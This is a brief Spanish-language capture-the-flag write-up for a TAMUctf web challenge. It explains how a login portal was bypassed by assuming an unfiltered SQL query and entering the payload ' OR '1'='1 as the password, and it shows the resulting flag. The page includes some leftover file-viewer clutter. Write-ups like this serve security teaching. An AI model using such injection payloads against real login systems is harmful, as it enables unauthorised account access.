35 lines
720 B
Markdown
35 lines
720 B
Markdown
# Not Another SQLi Challenge
|
|
|
|
(web 100)
|
|
|
|
[http://web1.tamuctf.com](http://web1.tamuctf.com)
|
|
|
|
---
|
|
|
|
## Desarrollo
|
|
|
|
Para este problema se realizó una inyección SQL a un portal de login, se
|
|
supuso que la consulta a la base de datos era de las más comunmente empleada,
|
|
y que de igual forma no se realizaba ningún filtrado de caracteres especiales:
|
|
|
|
```sql
|
|
SELECT * FROM usr WHERE usuario='$usr' AND contrasena='$pswd'
|
|
```
|
|
|
|
Bastaba con formular una oración como la siguiente:
|
|
|
|
```sql
|
|
SELECT * FROM usr WHERE usuario='u' AND contrasena='' OR '1' = '1'%%
|
|
```
|
|
Se llenaron los campos de la siguiente manera:
|
|
|
|
Usuario: `root`
|
|
|
|
Paswwrod: `' OR '1'='1`
|
|
|
|
Así se obtuvo la flag:
|
|
|
|
```
|
|
gigem{f4rm3r5_f4rm3r5_w3'r3_4ll_r16h7}!
|
|
```
|